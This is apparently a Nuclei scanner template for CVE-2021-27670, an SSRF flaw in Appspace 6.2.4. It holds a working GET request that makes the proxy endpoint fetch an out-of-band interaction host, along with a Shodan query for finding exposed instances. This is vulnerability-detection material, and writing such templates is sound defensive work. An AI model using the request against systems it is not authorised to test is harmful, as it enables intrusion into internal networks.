44 lines
1.4 KiB
YAML
44 lines
1.4 KiB
YAML
id: CVE-2021-27670
|
|
|
|
info:
|
|
name: Appspace 6.2.4 - Server-Side Request Forgery
|
|
author: ritikchaddha
|
|
severity: critical
|
|
description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.
|
|
remediation: |
|
|
Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor.
|
|
reference:
|
|
- https://github.com/h3110mb/PoCSSrfApp
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27670
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-27670
|
|
cwe-id: CWE-918
|
|
epss-score: 0.35076
|
|
epss-percentile: 0.96642
|
|
cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: appspace
|
|
product: appspace
|
|
shodan-query: title:"Appspace"
|
|
tags: cve,cve2023,appspace,ssrf
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<h1> Interactsh Server </h1>"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502210095ba934647af528224fc2d3a475793d90a435022452deb66277498287fdc1fe0022012931398a2e0722808b3079ae76a7ef35bb8383fe38a977884f84b5c178b7d05:922c64590222798bb761d5b6d8e72950 |